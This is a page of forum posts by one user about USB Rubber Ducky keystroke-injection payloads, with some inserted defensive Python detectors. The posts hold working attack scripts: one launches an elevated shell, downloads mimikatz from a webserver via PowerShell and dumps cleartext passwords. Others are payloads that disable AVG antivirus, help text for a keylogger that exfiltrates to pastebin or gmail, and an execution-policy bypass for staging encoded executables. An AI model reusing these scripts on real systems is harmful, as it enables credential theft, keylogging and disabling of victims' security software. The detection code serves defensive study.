redmeatuk

Posts posted by redmeatuk

  1. I've not seen any switches or examples of how to get mimikatz to output to a file. There may be an equivalent of script/tee on Windows, but this works: you will not see any output, as standard error and standard output will be redirected to a text file of your choosing, e.g. -:

    mimikatz.exe > output.txt 2>&1

    Then just issue your commands as normal and exit.

    Cloud passwords? Not sure; give it time though, I'm sure someone will figure it all out :)

  2. overwraith, I've not really seen any tutorials for Nishang; there should be some examples on http://labofapenetrationtester.blogspot.com

    As for displaying the help for the PowerShell scripts, try placing a .\ before the script; it worked for me -:

    PS C:\Users\luser\Desktop\nishang> Get-Help .\Keylogger.ps1 -full
    
    
    NAME
        C:\Users\luser\Desktop\nishang\Keylogger.ps1
    
    
    SYNOPSIS
        Nishang Payload which logs keys.
    
    
    SYNTAX
        C:\Users\luser\Desktop\nishang\Keylogger.ps1 [-dev_key] <String> [-username
        ] <String> [-password] <String> [-keyoutoption] <String> [-MagicString] <St
        ring> [-CheckURL] <String> [<CommonParameters>]
    
    
    
    
    DESCRIPTION
        This payload logs a user's keys and writes them to file key.log (I know its
         bad :|) in user's temp directory.
        The keys are than pasted to pastebin|tinypaste|gmail|all as per selection.
    
    
    
    
    PARAMETERS
        -dev_key <String>
            The Unique API key provided by pastebin when you register a free accoun
            t.
            Unused for tinypaste.
            Unused for gmail option.
    
    
            Required?                    true
            Position?                    1
            Default value
            Accept pipeline input?       false
            Accept wildcard characters?
    
    
        -username <String>
            Username for the pastebin account where data would be pasted.
            Username for the tinypaste account where data would be pasted.
            Username for the gmail account where attachment would be sent as an att
            achment.
    
    
            Required?                    true
            Position?                    2
            Default value
            Accept pipeline input?       false
            Accept wildcard characters?
    
    
        -password <String>
            Password for the pastebin account where data would be pasted.
            Password for the tinypaste account where data would be pasted.
            Password for the gmail account where data would be sent.
    
    
            Required?                    true
            Position?                    3
            Default value
            Accept pipeline input?       false
            Accept wildcard characters?
    
    
        -keyoutoption <String>
            The method you want to use for exfitration of data.
            "0" for displaying on console
            "1" for pastebin.
            "2" for gmail
            "3" for tinypaste
    
    
            Required?                    true
            Position?                    4
            Default value
            Accept pipeline input?       false
            Accept wildcard characters?
    
    
        -MagicString <String>
            The string which when found at CheckURL will stop the keylogger.
    
    
            Required?                    true
            Position?                    5
            Default value
            Accept pipeline input?       false
            Accept wildcard characters?
    
    
        -CheckURL <String>
            The URL which would contain the MagicString used to stop keylogging.
    
    
            Required?                    true
            Position?                    6
            Default value
            Accept pipeline input?       false
            Accept wildcard characters?
    
    
        <CommonParameters>
            This cmdlet supports the common parameters: Verbose, Debug,
            ErrorAction, ErrorVariable, WarningAction, WarningVariable,
            OutBuffer and OutVariable. For more information, type,
            "get-help about_commonparameters".
    
    
    INPUTS
    
    
    OUTPUTS
    
    
        -------------------------- EXAMPLE 1 --------------------------
    
    
        PS >.\Keylogger.ps1 3 <dev_key> <username> <pass>
    
    
    
    
    RELATED LINKS
         http://labofapenetrationtester.blogspot.com/
        http://code.google.com/p/nishang
  3. Hello all,

    Apologies in advance if this is old news to all.

    Anyone checked out Nishang? It's a collection of handy PowerShell scripts for penetration testing written by Nikhil Mittal which may come in handy for Ducky payloads -:

    https://code.google.com/p/nishang/

    http://labofapenetrationtester.blogspot.co.uk/

    I had a look at http://nishang.googlecode.com/svn/trunk/ExetoText.ps1 in particular and this uses a technique for encoding binaries to text, demonstrated here -:

    http://www.exploit-monday.com/2011/09/dropping-executables-with-powershell.html

    You may need to run the following as administrator to bypass a PowerShell security policy which may prevent you from creating an executable file:

    powershell.exe -executionpolicy bypass -file ExetoText.ps1 <payload.exe> <payload.txt>

    Where payload.exe is your executable e.g. mimikatz.exe and payload.txt is the encoded version of your exe file.

    If you were to place this encoded text file and http://nishang.googlecode.com/svn/trunk/TexttoExe.ps1 on your SD card (if you're running Twin Duck firmware etc.) then you wouldn't need an Internet connection to download the file; you can just run this PowerShell script to convert the encoded text back to the exe. This may get flagged by AV, so your mileage may vary.

    DarkOperator also has a nice Python script and exe to generate base64 encoded PowerShell commands -:

    http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html

    Cheers

    Aaron
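The post above describes staging an executable as an encoded text file and rebuilding it on the target with TexttoExe.ps1. From the defender's side, the useful check is the reverse: does a text file on removable media or in a user profile decode to a Windows executable? The script below is an added example, not Nishang's code or the exploit-monday technique itself; it assumes the text encoding is base64 (an assumption, the page does not say which encoding ExetoText.ps1 uses) and uses a constructed, non-runnable MZ/PE header stand-in as sample input so it runs offline.

```python
import base64
import binascii
import struct


def _build_fake_pe(size=128):
    """Constructed stand-in for a Windows executable: an MZ header whose
    e_lfanew field (offset 0x3C) points at a 'PE\\0\\0' signature. It is not
    runnable and exists only so the check below has something to detect."""
    buf = bytearray(size)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)   # e_lfanew -> 0x40
    buf[0x40:0x44] = b"PE\x00\x00"
    return bytes(buf)


# Constructed inputs: the encoded fake PE, base64 of harmless text, and prose.
ENCODED_FAKE_PE = base64.b64encode(_build_fake_pe()).decode("ascii")
ENCODED_TEXT = base64.b64encode(b"just a readme, nothing to see").decode("ascii")
PLAIN_PROSE = "Meeting notes for Monday: review the quarterly numbers."


def decode_base64_blob(text):
    """Decode a text blob as base64, ignoring any line wrapping the encoder
    added; return None when the text is not valid base64 at all."""
    compact = "".join(text.split())
    if len(compact) < 4 or len(compact) % 4:
        return None
    try:
        return base64.b64decode(compact, validate=True)
    except (binascii.Error, ValueError):
        return None


def looks_like_pe(data):
    """True when data carries the MZ header plus PE signature of a Windows executable."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return e_lfanew + 4 <= len(data) and data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def classify_text(text):
    """Triage verdict for one text file: is it base64, and does it decode to a PE?"""
    data = decode_base64_blob(text)
    if data is None:
        return {"base64": False, "is_pe": False, "decoded_size": 0}
    return {"base64": True, "is_pe": looks_like_pe(data), "decoded_size": len(data)}


if __name__ == "__main__":
    for label, sample in [("fake_pe", ENCODED_FAKE_PE), ("text", ENCODED_TEXT), ("prose", PLAIN_PROSE)]:
        print(label, classify_text(sample))
```

Point it at the contents of a .txt file (for instance with `classify_text(open(path).read())`) and a `True` for `is_pe` marks a file worth pulling for analysis; `decoded_size` gives a quick sanity check against the size of any binary later found on the host.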

  4. Hello all,

    This is a Ducky script I knocked up to use the wonderful mimikatz tool. This tool allows you to dump hashes including the clear text passwords for wdigest from memory.

    http://blog.gentilkiwi.com/securite/mimikatz/minidump

    http://www.room362.com/blog/2013/6/7/using-mimikatz-alpha-or-getting-clear-text-passwords-with-a.html

    Requirements -:

    - Webserver to host the Mimikatz binary for your architecture (I tested this on Windows 7 Home Premium 64-bit); you need the ones in the 'alpha' subfolder of the zip/7z file for your architecture

    - Local user needs to have an administrator account/privs

    What does it do?

    1. It spawns a command shell with administrator privileges

    2. It downloads mimikatz from a webserver using powershell

    3. Uses mimikatz to dump wdigest passwords from memory

    4. Cleans up by deleting the binaries it downloaded

    It could be improved by using sneaky data exfil techniques to transfer the data encrypted offsite, e.g. socat, ncat SSL, stunnel etc. If you have a firmware installed that lets you store files you could copy the output to the SD card. Also, the mimikatz file could be encoded and run through PowerShell to generate the executable instead of 'wget'ing' the file.

    You may need to adjust timings in this script to play nice on your machine(s).

    Script -:

    REM mimikatz ducky script to dump local wdigest passwords from memory using mimikatz (local user needs to be an administrator/have admin privs)
    DELAY 3000
    CONTROL ESCAPE
    DELAY 1000
    STRING cmd
    DELAY 1000
    CTRL-SHIFT ENTER
    DELAY 1000
    ALT y
    DELAY 300
    ENTER
    STRING powershell (new-object System.Net.WebClient).DownloadFile('http://<replace me with webserver ip/host>/mimikatz.exe','%TEMP%\mimikatz.exe')
    DELAY 300
    ENTER
    DELAY 3000
    STRING %TEMP%\mimikatz.exe
    DELAY 300
    ENTER
    DELAY 3000
    STRING privilege::debug
    DELAY 300
    ENTER
    DELAY 1000
    STRING sekurlsa::logonPasswords full
    DELAY 300
    ENTER
    DELAY 1000
    STRING exit
    DELAY 300
    ENTER
    DELAY 100
    STRING del %TEMP%\mimikatz.exe
    DELAY 300
    ENTER
    

    Thanks for reading :)

    Aaron
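The script above leaves a very recognisable trail in process-creation telemetry: an elevated cmd.exe, a PowerShell WebClient.DownloadFile call whose destination is the user's temp directory, and then that same file being executed a few seconds later. The detector below is an added example written for this page, not part of the original post; it runs over constructed, simplified Sysmon-style process-creation records (field names and values are made up for the example) and correlates the download with the execution. It relies on the fact that cmd.exe expands %TEMP% before launching PowerShell, so the logged command line carries the expanded path.

```python
import re
from datetime import datetime

# Constructed process-creation records (Sysmon event 1 style, simplified);
# sample data written for this example, not logs from the original post.
SAMPLE_EVENTS = [
    {"time": "2013-06-10T09:00:01", "integrity": "High",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd"},
    {"time": "2013-06-10T09:00:03", "integrity": "High",
     "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell (new-object System.Net.WebClient).DownloadFile("
                "'http://203.0.113.5/mimikatz.exe',"
                "'C:\\Users\\luser\\AppData\\Local\\Temp\\mimikatz.exe')"},
    {"time": "2013-06-10T09:00:07", "integrity": "High",
     "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Users\luser\AppData\Local\Temp\mimikatz.exe",
     "cmdline": r"C:\Users\luser\AppData\Local\Temp\mimikatz.exe"},
    # Benign noise: a download to a non-temp folder that is never executed.
    {"time": "2013-06-10T09:05:00", "integrity": "Medium",
     "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell (New-Object Net.WebClient).DownloadFile("
                "'http://intranet.example/update.msi','C:\\Software\\update.msi')"},
]

DOWNLOAD_RE = re.compile(
    r"DownloadFile\(\s*'(?P<url>[^']+)'\s*,\s*'(?P<dest>[^']+)'\s*\)", re.IGNORECASE)
TEMP_DIR_RE = re.compile(r"(\\Temp\\|%TEMP%)", re.IGNORECASE)


def _ts(event):
    return datetime.strptime(event["time"], "%Y-%m-%dT%H:%M:%S")


def _same_file(dest, image):
    """Match the download target against the executed image; if the logged
    destination still contains an unexpanded %TEMP%, fall back to the file name."""
    dest, image = dest.lower(), image.lower()
    if dest == image:
        return True
    return dest.startswith("%temp%") and dest.rsplit("\\", 1)[-1] == image.rsplit("\\", 1)[-1]


def detect_temp_drop_and_run(events, window_seconds=60):
    """Return one alert per download-to-temp that is executed within the window.
    Each alert records whether an elevated cmd.exe preceded the download, which
    corresponds to the run-as-administrator step of the posted script."""
    events = sorted(events, key=_ts)
    elevated_shell_at = None
    pending = []   # (time, url, dest, elevated) downloads awaiting execution
    alerts = []
    for ev in events:
        if ev["image"].lower().endswith("\\cmd.exe") and ev["integrity"] == "High":
            elevated_shell_at = _ts(ev)
            continue
        m = DOWNLOAD_RE.search(ev["cmdline"])
        if m and TEMP_DIR_RE.search(m.group("dest")):
            elevated = (elevated_shell_at is not None and
                        0 <= (_ts(ev) - elevated_shell_at).total_seconds() <= window_seconds)
            pending.append((_ts(ev), m.group("url"), m.group("dest"), elevated))
            continue
        if TEMP_DIR_RE.search(ev["image"]):
            for t0, url, dest, elevated in pending:
                if _same_file(dest, ev["image"]) and 0 <= (_ts(ev) - t0).total_seconds() <= window_seconds:
                    alerts.append({"time": ev["time"], "url": url,
                                   "image": ev["image"], "elevated_shell": elevated})
    return alerts


if __name__ == "__main__":
    for alert in detect_temp_drop_and_run(SAMPLE_EVENTS):
        print(alert)
```

The correlation is deliberately narrow (download into a temp directory, then execution of that exact file) so that ordinary installer downloads, like the last sample record, do not fire; the `elevated_shell` flag is what separates the admin-privilege variant in this post from a plain user-level drop.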

  5. Hello all,

    I've created payloads to temporarily disable AVG protection for versions 2012 and 2013, tested on Windows 7. You may need to change DELAY in the following script to play nice on other machines. These timings worked for me. I didn't have much joy with the REPEAT statement, hence lots of tabs etc.

    Does anyone have ducky scripts for other AV?

    Disable AVG 2013 -:

    REM This payload temporarily disables AVG 2013 for 15 minutes assumes that UAC has not been used recently
    DELAY 3000
    GUI r
    DELAY 1000
    STRING C:\Program Files (x86)\AVG\AVG2013\avgui
    DELAY 400
    ENTER
    DELAY 1000
    TAB
    DELAY 400
    TAB
    DELAY 400
    TAB
    DELAY 400
    TAB
    DELAY 1000
    TAB
    DELAY 400
    TAB
    DELAY 400
    TAB
    DELAY 400
    TAB
    DELAY 400
    TAB
    DELAY 400
    TAB
    DELAY 400
    TAB
    DELAY 400
    TAB
    DELAY 400
    TAB
    DELAY 400
    TAB
    DELAY 400
    TAB
    DELAY 400
    TAB
    DELAY 400
    TAB
    DELAY 400
    ENTER
    DELAY 400
    DOWN
    DELAY 400
    DOWN
    DELAY 400
    DOWN
    DELAY 400
    DOWN
    DELAY 400
    DOWN
    DELAY 400
    DOWN
    DELAY 400
    DOWN
    DELAY 400
    DOWN
    DELAY 400
    ENTER
    DELAY 400
    TAB
    DELAY 400
    TAB
    DELAY 400
    TAB
    DELAY 400
    TAB
    DELAY 400
    TAB
    DELAY 400
    TAB
    DELAY 400
    TAB
    DELAY 400
    TAB
    DELAY 400
    TAB
    DELAY 400
    TAB
    DELAY 400
    TAB
    DELAY 400
    TAB
    DELAY 400
    DOWN
    DELAY 400
    DOWN
    DELAY 400
    TAB
    DELAY 400
    TAB
    DELAY 400
    TAB
    DELAY 400
    TAB
    DELAY 400
    ENTER
    DELAY 400
    TAB
    DELAY 400
    DOWN
    DELAY 400
    DOWN
    DELAY 400
    ENTER
    DELAY 400
    TAB
    DELAY 400
    ENTER
    DELAY 400
    ALT y
    DELAY 400
    TAB
    DELAY 400
    TAB
    DELAY 400
    TAB
    DELAY 400
    ENTER
    DELAY 400
    ALT F4
    

    Disable AVG 2012

    REM this payload disables AVG 2012 until next restart assumes that UAC has not been used recently
    DELAY 3000
    GUI r
    DELAY 400
    STRING C:\Program Files (x86)\AVG\AVG2012\avgui
    DELAY 400
    ENTER
    DELAY 1000
    ALT t
    DELAY 400
    DOWN
    DELAY 400
    DOWN
    DELAY 400
    DOWN
    DELAY 400
    DOWN
    DELAY 400
    DOWN
    DELAY 400
    ENTER
    DELAY 400
    DOWN
    DELAY 400
    DOWN
    DELAY 400
    TAB
    DELAY 400
    TAB
    DELAY 400
    TAB
    DELAY 400
    TAB
    DELAY 400
    SPACE
    DELAY 400
    TAB
    DELAY 400
    TAB
    DELAY 400
    TAB
    DELAY 400
    ENTER
    DELAY 400
    TAB
    DELAY 400
    DOWN
    DELAY 400
    DOWN
    DELAY 400
    ENTER
    DELAY 400
    ALT y
    DELAY 400
    ALT-F4
    

    --

    Cheers

    Aaron

  6. Ahh, thanks for pointing me to the keymap files, midnitesnake. I needed to make the following amendments to the resources\uk.properties file before the Ducky would echo out the backslash character.

    Here are the modifications I made to the file -:

    Comment out line 3

    //KEY_BACKSLASH=64

    ASCII code 92 is backslash so I left line 126 uncommented

    ASCII_23 = KEY_BACKSLASH

    Output from test script now prints following lines -:

    backslash test - \

    double backslash escaping test - \\

  7. Hello all,

    Apologies in advance if this is an issue that has previously been resolved. I searched this forum for my issue and in the FAQ but wasn't able to find a solution.

    The issue I have is that I'm unable to get the Ducky to print a backslash character using a UK keyboard map. Printing forward slash character is fine.

    Tested with the following -:

    Firmware - stock firmware that came with the Ducky (v1 I believe) and the Ducky Community edition v2.1 (duck_v2.1hex)

    Encoders - v1.2 duckencoder from the GitHub wiki and v2.6 from the Google Code Ducky Community site

    Keyboard using UK keyboard map on Windows 7

    Simple script to output a backslash character -:

    DELAY 3000

    GUI r

    STRING notepad.exe

    DELAY 100

    ENTER

    STRING backslash test - \

    DELAY 100

    ENTER

    STRING double backslash escaping test - \\

    Payload generation command with v2.6 encoder -:

    java -jar encoder.jar -l uk -i ducktst.txt -o <ducky drive>\inject.bin

    If I remove the -l uk option to default to the US keyboard map it will print a pound/hash character for the backslash which is what I would expect to see.

    When the encoder generates the payload it passes all the checks but for the Duckyscript check it returns a warning - 'Key not found:KEY_NON_US_100'.

    Anyone come across this problem before?

    Thanks in advance,

    Aaron
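Posts 6 and 7 above come down to how the encoder resolves each character of a STRING line: an ASCII_xx entry in the keymap names a key, and that key name must in turn be defined with a HID usage id, otherwise the encoder warns 'Key not found:...'. The checker below is an added example written for this page, not the duckencoder's own code. It parses a constructed uk.properties-style fragment in the layout the posts quote (KEY_NAME = usage id, ASCII_hex = KEY_NAME, with comma-separated combinations and // comment lines), then resolves every STRING character of a small constructed test script and reports the same kind of warning. The usage ids are the standard USB HID keyboard codes; the fragment itself is made up and is not the real file.

```python
# Constructed uk.properties-style fragment (not the real encoder file). Key
# definitions carry USB HID usage ids; ASCII_xx lines map a character (hex
# code) to the key or key combination that types it. On a UK layout '#' sits
# on the KEY_BACKSLASH position and '\' on the separate non-US key, which is
# the mapping the posts are fighting with.
KEYMAP_MISSING_NON_US_KEY = """
// commented-out lines are ignored, as in the edit described in post 6
KEY_BACKSLASH = 0x31
KEY_SPACE = 0x2C
KEY_E = 0x08
KEY_S = 0x16
KEY_T = 0x17
KEY_SHIFT = 0x02
ASCII_20 = KEY_SPACE
ASCII_23 = KEY_BACKSLASH
ASCII_45 = KEY_SHIFT, KEY_E
ASCII_65 = KEY_E
ASCII_73 = KEY_S
ASCII_74 = KEY_T
ASCII_5C = KEY_NON_US_100
"""

# Same fragment with the key that the UK backslash mapping refers to defined.
KEYMAP_FIXED = KEYMAP_MISSING_NON_US_KEY + "KEY_NON_US_100 = 0x64\n"

# Constructed test script in the style of post 7: one backslash, one hash.
TEST_SCRIPT = "DELAY 100\nSTRING test \\\nSTRING test #\n"


def parse_keymap(text):
    """Return (key definitions, ascii mappings) from a properties-style keymap."""
    keys, ascii_map = {}, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", "//")) or "=" not in line:
            continue
        name, value = (part.strip() for part in line.split("=", 1))
        if name.upper().startswith("ASCII_"):
            ascii_map[int(name[6:], 16)] = [k.strip() for k in value.split(",")]
        else:
            keys[name] = int(value, 0)   # accepts 0x31 as well as plain decimal
    return keys, ascii_map


def check_script(keymap_text, script_text):
    """Resolve every character of each STRING line against the keymap.

    Returns (line number, character, message) tuples for characters with no
    ASCII mapping and for mappings that name a key the file never defines,
    which is the encoder's 'Key not found:' situation."""
    keys, ascii_map = parse_keymap(keymap_text)
    warnings = []
    for lineno, line in enumerate(script_text.splitlines(), 1):
        if not line.startswith("STRING "):
            continue
        for ch in line[len("STRING "):]:
            names = ascii_map.get(ord(ch))
            if names is None:
                warnings.append((lineno, ch, "No ASCII mapping"))
                continue
            for name in names:
                if name not in keys:
                    warnings.append((lineno, ch, "Key not found:" + name))
    return warnings


if __name__ == "__main__":
    print("before fix:", check_script(KEYMAP_MISSING_NON_US_KEY, TEST_SCRIPT))
    print("after fix: ", check_script(KEYMAP_FIXED, TEST_SCRIPT))
```

Run against the incomplete fragment the checker reports the backslash on line 2 as `Key not found:KEY_NON_US_100` while the `#` on line 3 resolves cleanly through KEY_BACKSLASH; once the non-US key is defined the script resolves without warnings. Pointing `parse_keymap` at a real keymap file and `check_script` at a real script gives the same pre-flight check before encoding.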
